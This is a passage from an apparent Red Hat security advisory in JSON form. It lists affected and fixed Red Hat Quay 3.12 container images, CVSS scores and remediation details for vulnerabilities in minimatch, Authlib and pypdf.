"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams"
},
{
"cve": "CVE-2026-27904",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-26T02:01:23.004531+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442922"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "RHBZ#2442922",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442922"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27904",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27904"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74"
}
],
"release_date": "2026-02-26T01:07:42.693000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-18T16:21:15+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4942"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions"
},
{
"cve": "CVE-2026-27962",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-03-16T18:02:07.041902+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448164"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker\u0027s key, allowing them to bypass authentication and gain unauthorized access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Authentication bypass due to JWK Header Injection vulnerability",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This critical vulnerability in Authlib\u0027s JWS implementation allows unauthenticated attackers to forge JWTs by embedding their own cryptographic key in the token header. Impact is high to confidentiality and integrity as attackers can bypass authentication.\n\nThe impact for Red Hat Quay is rated as low because it imports authlib solely as a JWK parsing utility and performs all JWT signature verification through PyJWT, so the vulnerable jws.deserialize_compact() code path is never called.\n\nRed Hat OpenShift AI is not affected, since authlib is only present as a transitive dependency in the dev dependency group and is not included in production image builds, so the vulnerable code is not present in the shipped product.\n\nRed Hat Satellite is not affected, as authlib is only present as a dependency of fastmcp. In Satellite, fastmcp only invokes authlib using jwt.decode() which isn\u0027t able to reach the vulnerability condition even with key=none.",
"title": "Statement"
},
{
"category": "general",
